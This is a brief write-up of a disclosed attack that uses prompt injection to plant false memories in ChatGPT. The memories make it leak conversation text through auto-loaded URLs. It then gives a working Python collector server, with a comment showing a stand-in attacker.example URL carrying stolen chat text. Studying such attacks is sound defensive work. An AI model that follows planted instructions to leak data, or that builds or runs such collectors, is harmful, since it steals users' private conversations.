A newly disclosed attack exploits ChatGPT's long-term memory to create a persistent data exfiltration channel. Security researcher Johann Rehberger demonstrated how an attacker can use prompt injection to plant false memories in ChatGPT; because stored memories are carried into every future conversation, the channel lets the attacker steal user data in perpetuity. The finding highlights manipulation and false-information storage vulnerabilities in ChatGPT's new memory feature, and was discussed in a report by Schneier on Security.
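The exploit reportedly delivered the stolen data by having the planted memory instruct the model to embed conversation text in URLs pointing at an attacker-controlled server, which the client fetches automatically when rendered (for example, as an image). Below is a minimal sketch of what the attacker-side collector could look like under those assumptions; the host, port, path, and the `d` query parameter are hypothetical illustrations, not details taken from the research.

```python
# collector.py -- illustrative sketch of an attacker-side collection endpoint.
# The host, port, path, and "d" parameter are hypothetical examples, not
# details from the actual research.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

class Collector(BaseHTTPRequestHandler):
    def do_GET(self):
        # A planted memory could cause the assistant to render a URL such as
        #   https://attacker.example/c?d=<url-encoded conversation text>
        # Fetching that URL (e.g. as an auto-loaded image) delivers the data.
        query = parse_qs(urlparse(self.path).query)
        leaked = query.get("d", [""])[0]
        print(f"exfiltrated: {leaked!r}")
        # A real endpoint would return a tiny valid image so the fetch fails
        # silently in the chat UI; an empty 200 keeps this sketch short.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), Collector).serve_forever()
```

An auto-fetched URL is a natural carrier for such a channel because the client loads it without any user action, so each conversation turn can quietly deliver another payload to the collector for as long as the planted memory remains stored.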